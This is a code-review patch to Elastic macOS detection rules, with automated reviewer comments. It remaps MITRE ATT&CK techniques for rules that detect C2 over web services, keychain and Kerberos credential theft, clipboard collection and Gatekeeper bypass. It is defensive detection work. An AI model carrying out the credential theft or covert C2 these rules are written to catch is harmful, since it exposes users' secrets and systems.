- [rule.threat.tactic]
- name = "Command and Control"
- id = "TA0011"
- reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
- [[rule.threat.technique]]
- name = "Ingress Tool Transfer"
- id = "T1105"
- reference = "https://attack.mitre.org/techniques/T1105/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
-
- [[rule.threat.technique]]
- name = "User Execution"
- id = "T1204"
- reference = "https://attack.mitre.org/techniques/T1204/"
-
- [[rule.threat.technique.subtechnique]]
- name = "Malicious File"
- id = "T1204.002"
- reference = "https://attack.mitre.org/techniques/T1204/002/"
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/macos/command_and_control_google_calendar_c2_via_script.toml b/rules/macos/command_and_control_google_calendar_c2_via_script.toml
index 9d68b0d613a..00cfc509299 100644
--- a/rules/macos/command_and_control_google_calendar_c2_via_script.toml
+++ b/rules/macos/command_and_control_google_calendar_c2_via_script.toml
@@ -2,7 +2,7 @@
creation_date = "2026/01/30"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2026/01/30"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -24,15 +24,7 @@ references = [
 risk_score = 73
 rule_id = "abc7a2be-479e-428b-b0b3-1d22bda46dd9"
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: macOS",
- "Use Case: Threat Detection",
- "Tactic: Command and Control",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide"
-]
+tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 note = """## Triage and analysis
@@ -83,40 +75,17 @@ sequence by process.entity_id with maxspan=20s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" - - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[[rule.threat.technique.subtechnique]] +id = "T1102.001" +name = "Dead Drop Resolver" +reference = "https://attack.mitre.org/techniques/T1102/001/" - [[rule.threat.technique.subtechnique]] - name = "JavaScript" - id = "T1059.007" - reference = "https://attack.mitre.org/techniques/T1059/007/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/macos/command_and_control_network_connection_to_oast_domain.toml b/rules/macos/command_and_control_network_connection_to_oast_domain.toml index 0da1e9b9455..1a6d685d035 100644 --- a/rules/macos/command_and_control_network_connection_to_oast_domain.toml +++ b/rules/macos/command_and_control_network_connection_to_oast_domain.toml 
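Review bot: The sub-technique for this rule changes from T1102.002 Bidirectional Communication to T1102.001 Dead Drop Resolver, and that does not obviously fit a calendar-based C2 channel: Dead Drop Resolver covers a web service that only hosts a pointer to the real C2 infrastructure, whereas calendar-event C2 (as the file name `command_and_control_google_calendar_c2_via_script` suggests) normally exchanges tasking and results through the service itself, which is .002, or .003 One-Way Communication if results never flow back. Unless the query outside this hunk specifically keys on a one-time fetch of a C2 address rather than ongoing traffic, I would keep `id = "T1102.002"` / `name = "Bidirectional Communication"` / `reference = "https://attack.mitre.org/techniques/T1102/002/"`. Dropping the Execution entry is consistent with the tag change earlier in this file.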
@@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -22,14 +22,7 @@ references = [ risk_score = 73 rule_id = "54214c47-be7c-4f6b-8ef2-78832f9f8f42" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" note = """## Triage and analysis @@ -77,25 +70,25 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" - [[rule.threat.technique]] - name = "Exfiltration Over Web Service" - id = "T1567" - reference = "https://attack.mitre.org/techniques/T1567/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" 
diff --git a/rules/macos/command_and_control_perl_outbound_network_connection.toml b/rules/macos/command_and_control_perl_outbound_network_connection.toml index 5241029aa80..219cadf1453 100644 --- a/rules/macos/command_and_control_perl_outbound_network_connection.toml +++ b/rules/macos/command_and_control_perl_outbound_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,15 +50,7 @@ This rule detects Perl starting on macOS and then initiating an outbound connect risk_score = 47 rule_id = "aba3bc11-e02f-4a03-8889-d86ea1a44f76" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by process.entity_id with maxspan=30s 
@@ -74,30 +66,12 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/command_and_control_potential_etherhiding_c2.toml b/rules/macos/command_and_control_potential_etherhiding_c2.toml index d6eb9a913f6..75546cf0d82 100644 --- a/rules/macos/command_and_control_potential_etherhiding_c2.toml +++ b/rules/macos/command_and_control_potential_etherhiding_c2.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
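Review bot: This rule now maps only to Execution/T1059 although, per the description quoted in the previous hunk header ("detects Perl starting on macOS and then initiating an outbound connect…") and the `sequence by process.entity_id` query prefix, the outbound connection is the half of the sequence that distinguishes it from plain interpreter execution, so dropping Command and Control entirely removes the tactic the rule was written for. If that is intentional, the path `command_and_control_perl_outbound_network_connection.toml` no longer reflects the mapped tactic and should be renamed if the repo keeps its tactic-prefixed naming convention (the same remark applies to the pbpaste rule later in this patch, which moves to Collection). Otherwise keep a second entry with `[rule.threat.tactic]` `id = "TA0011"` and a technique that matches the query, such as the T1071 that was removed.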
@@ -22,15 +22,7 @@ references = [
 risk_score = 73
 rule_id = "bba8c7d1-172b-435d-9034-02ed9289c628"
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: macOS",
- "Use Case: Threat Detection",
- "Tactic: Command and Control",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide"
-]
+tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 note = """## Triage and analysis
@@ -80,45 +72,17 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" - - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" - [[rule.threat.technique.subtechnique]] - name = "JavaScript" - id = "T1059.007" - reference = "https://attack.mitre.org/techniques/T1059/007/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml index ba69a5cda68..f56d62b60f8 100644 --- a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml 
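Review bot: T1102.002 Bidirectional Communication is kept as the only sub-technique here while the Execution entry is dropped, yet for an EtherHiding pattern, where the endpoint reads a payload or next-stage location out of a smart contract on a public chain service, the traffic is a lookup of further infrastructure or strictly one-directional, which ATT&CK models as T1102.001 Dead Drop Resolver or T1102.003 One-Way Communication rather than .002. Worth checking against the query outside this hunk; note the Google Calendar rule in this same patch was moved the other way, to Dead Drop Resolver, so the two mappings look swapped relative to how those channels usually behave.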
+++ b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,22 +80,22 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" +[[rule.threat.technique.subtechnique]] +id = "T1102.003" +name = "One-Way Communication" +reference = "https://attack.mitre.org/techniques/T1102/003/" - [[rule.threat.technique]] - name = "Web Service" - id = "T1102" - reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat.technique.subtechnique]] - name = "Bidirectional Communication" - id = "T1102.002" - reference = "https://attack.mitre.org/techniques/T1102/002/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml b/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml index cd1e4aa5a67..3777c19d34f 100644 --- a/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml +++ b/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/03/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,16 +85,10 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "destination.domain"] diff --git a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml index 9a0859fd9b0..33c46e2cb91 100644 --- a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml +++ b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -188,11 +188,15 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "destination.domain"] diff --git a/rules/macos/credential_access_high_volume_of_pbpaste.toml b/rules/macos/credential_access_high_volume_of_pbpaste.toml index 8cf8dad2102..91617be6e37 100644 --- a/rules/macos/credential_access_high_volume_of_pbpaste.toml 
+++ b/rules/macos/credential_access_high_volume_of_pbpaste.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["endpoint", "jamf_protect"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.investigate]] @@ -88,15 +88,7 @@ Jamf Protect is integrated into the Elastic Agent using Fleet. Upon configuratio - Click "Save and Continue". """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Jamf Protect", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Data Source: Jamf Protect", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -108,14 +100,13 @@ sequence by host.hostname, host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1056" -name = "Input Capture" -reference = "https://attack.mitre.org/techniques/T1056/" +[[rule.threat.technique]] +id = "T1115" +name = "Clipboard Data" +reference = "https://attack.mitre.org/techniques/T1115/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/credential_access_kerberosdump_kcc.toml b/rules/macos/credential_access_kerberosdump_kcc.toml index e566cdb00e5..793106b873c 100644 --- a/rules/macos/credential_access_kerberosdump_kcc.toml +++ b/rules/macos/credential_access_kerberosdump_kcc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -101,24 +101,18 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" -[[rule.threat.technique.subtechnique]] -id = "T1558.003" -name = "Kerberoasting" -reference = "https://attack.mitre.org/techniques/T1558/003/" - +[[rule.threat.technique.subtechnique]] +id = "T1558.005" +name = "Ccache Files" +reference = "https://attack.mitre.org/techniques/T1558/005/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml index d1bc68892c1..8fdfc554d3f 100644 --- a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml +++ b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -107,29 +107,18 @@ Keychain is macOS's secure storage system for managing user credentials, includi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" reference = "https://attack.mitre.org/techniques/T1555/001/" - -[[rule.threat.technique]] -id = "T1555" -name = "Credentials from Password Stores" -reference = "https://attack.mitre.org/techniques/T1555/" -[[rule.threat.technique.subtechnique]] -id = "T1555.003" -name = "Credentials from Web Browsers" -reference = "https://attack.mitre.org/techniques/T1555/003/" - - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/macos/credential_access_mitm_localhost_webproxy.toml b/rules/macos/credential_access_mitm_localhost_webproxy.toml index 356443d7e15..2090aa8ae6e 100644 --- a/rules/macos/credential_access_mitm_localhost_webproxy.toml +++ b/rules/macos/credential_access_mitm_localhost_webproxy.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,14 +103,13 @@ Web proxy settings in macOS manage how web traffic is routed, often used to enha [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1539" -name = "Steal Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1539/" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - 
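Review bot: The duplicate `T1555` technique block is resolved by deleting the `T1555.003 Credentials from Web Browsers` sub-technique outright rather than merging it into the remaining block. The `security` command can also extract browser storage keys held in the keychain (Chrome Safe Storage and similar), so if the query for this rule, which is not in the hunk, matches those lookups the coverage is silently lost; the form that keeps one table per technique id is a single `[[rule.threat.technique]]` for T1555 followed by two `[[rule.threat.technique.subtechnique]]` tables, `id = "T1555.001"` and `id = "T1555.003"`. If the query only matches generic keychain password retrieval the deletion is right, and a sentence in the PR description saying so would save the next reviewer the same question.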
diff --git a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml index 24d5fa1fbd2..f6ff2838586 100644 --- a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml +++ b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,14 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -112,19 +105,36 @@ OSASCRIPT is a macOS utility that allows the execution of AppleScript and other [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1056" name = "Input Capture" reference = "https://attack.mitre.org/techniques/T1056/" + [[rule.threat.technique.subtechnique]] id = "T1056.002" name = "GUI Input Capture" reference = "https://attack.mitre.org/techniques/T1056/002/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml index 26ee109c54d..8cdf00243f1 100644 --- a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml +++ b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -73,10 +73,32 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" @@ -86,7 +108,6 @@ reference = "https://attack.mitre.org/techniques/T1555/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.path"] diff --git a/rules/macos/defense_evasion_apple_softupdates_modification.toml b/rules/macos/defense_evasion_apple_softupdates_modification.toml index 744d460b16f..a69bb661f7e 100644 --- a/rules/macos/defense_evasion_apple_softupdates_modification.toml +++ b/rules/macos/defense_evasion_apple_softupdates_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/15" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -99,19 +99,13 @@ In macOS environments, the SoftwareUpdate preferences manage system updates, cru [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml index 2a5331cde71..6a0a3ddec4b 100644 --- a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml +++ b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,19 +107,18 @@ In macOS, files downloaded from the internet are tagged with a quarantine attrib [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml index d56533056a0..83062f06243 100644 --- a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml +++ b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,14 +102,18 @@ Gatekeeper is a macOS security feature that ensures only trusted software runs b [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml index 026222507de..2ae593decbf 100644 --- a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml +++ b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -76,27 +76,17 @@ configuration where host.os.type == "macos" and event.action == "gatekeeper_over [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" - [[rule.threat.technique]] - name = "Impair Defenses" - id = "T1562" - reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" - [[rule.threat.technique.subtechnique]] - name = "Disable or Modify Tools" - id = "T1562.001" - reference = "https://attack.mitre.org/techniques/T1562/001/" - - [[rule.threat.technique]] - name = "Subvert Trust Controls" - id = "T1553" - reference = "https://attack.mitre.org/techniques/T1553/" - - [[rule.threat.technique.subtechnique]] - name = "Gatekeeper Bypass" - id = "T1553.001" - reference = "https://attack.mitre.org/techniques/T1553/001/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/macos/defense_evasion_modify_environment_launchctl.toml b/rules/macos/defense_evasion_modify_environment_launchctl.toml index cc25b452be3..b3b64c7f9f5 100644 --- a/rules/macos/defense_evasion_modify_environment_launchctl.toml +++ b/rules/macos/defense_evasion_modify_environment_launchctl.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
